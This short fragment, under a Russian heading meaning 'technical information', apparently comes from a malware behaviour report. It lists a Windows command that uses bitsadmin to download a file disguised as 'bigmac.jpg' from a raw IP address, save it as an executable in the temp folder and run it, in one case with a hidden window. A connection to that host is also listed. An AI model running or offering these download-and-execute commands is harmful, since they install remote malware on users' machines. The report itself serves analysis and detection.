Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://89.248.169.136/bigmac.jpg" "%tmp%/ASDlkoa.exe" && "%tmp%/ASDlkoa.exe"
- '89.##8.169.136':80
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://89.248.169.136/bigmac.jpg" "%tmp%/ASDlkoa.exe" && "%tmp%/ASDlkoa.exe"' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer /download "http://89.248.169.136/bigmac.jpg" "%LOCALAPPDATA%\Temp/ASDlkoa.exe"